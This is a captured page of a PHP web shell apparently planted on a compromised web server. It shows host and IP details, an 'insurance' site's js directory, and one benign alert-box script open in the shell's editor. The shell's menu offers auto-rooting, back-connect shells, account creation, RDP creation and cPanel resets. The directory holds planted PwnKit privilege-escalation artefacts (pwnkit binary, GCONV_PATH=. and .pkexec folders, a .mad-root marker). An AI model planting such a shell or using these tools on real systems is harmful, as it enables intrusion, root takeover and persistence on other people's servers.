Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 13.59.170.52
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
insurance /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
common-backend.js
1015
B
-rw-r--r--
common-nackend-end-backend.js
1.91
KB
-rw-r--r--
custom.js
2.86
KB
-rw-r--r--
dashbord.js
3.65
KB
-rw-r--r--
email-quotes-backend.js
1.53
KB
-rw-r--r--
helpers.js
23.45
KB
-rw-r--r--
insurance-listing-page.js
7.36
KB
-rw-r--r--
insurer-dashboard-backend.js
8.49
KB
-rw-r--r--
insurer-edit-backend.js
14.16
KB
-rw-r--r--
jquery-3.7.1.min.js
85.48
KB
-rw-r--r--
jquerydatatables2.0.8.min.js
88.28
KB
-rw-r--r--
messages-backend.js
2.28
KB
-rw-r--r--
policy-backend.js
2.96
KB
-rw-r--r--
policy-dashboard-backend.js
2.52
KB
-rw-r--r--
policy-edit-backend.js
2.25
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
qoutejs.js
7.67
KB
-rw-r--r--
sweetalert.min.js
39.85
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : common-nackend-end-backend.js
// Function to trigger the alert box function triggerAlert(type, message) { const alertBox = document.getElementById('alertBox'); const alertIcon = document.getElementById('alertIcon'); const alertText = document.getElementById('alertText'); // Reset classes alertBox.className = 'alert-box'; alertIcon.className = 'icon'; // Set the message and icon based on the type switch(type) { case 'success': alertBox.classList.add('alert-success'); alertIcon.textContent = '✔'; break; case 'error': alertBox.classList.add('alert-error'); alertIcon.textContent = '✖'; break; case 'warning': alertBox.classList.add('alert-warning'); alertIcon.textContent = '⚠'; break; default: break; } // Set the alert message alertText.textContent = message; // Show the alert box alertBox.style.display = 'flex'; // Hide the alert box after 3 seconds setTimeout(() => { alertBox.style.display = 'none'; }, 3000); } document.addEventListener('DOMContentLoaded', function () { var form = document.querySelector('.form-insurer'); window.Parsley.on('form:error', function() { // Find the first error field var firstErrorField = form.querySelector('.parsley-error'); if (firstErrorField) { // Smooth scroll to the first error element firstErrorField.scrollIntoView({ behavior: 'smooth', block: 'center' }); // Apply the shaky animation after the scroll completes setTimeout(function() { firstErrorField.classList.add('shakey-animation'); // Remove the shaky animation class after animation ends setTimeout(function() { firstErrorField.classList.remove('shakey-animation'); }, 500); // 500ms = duration of the shake animation }, 600); // Wait for the scroll to complete before shaking (adjust time if needed) } }); });
Close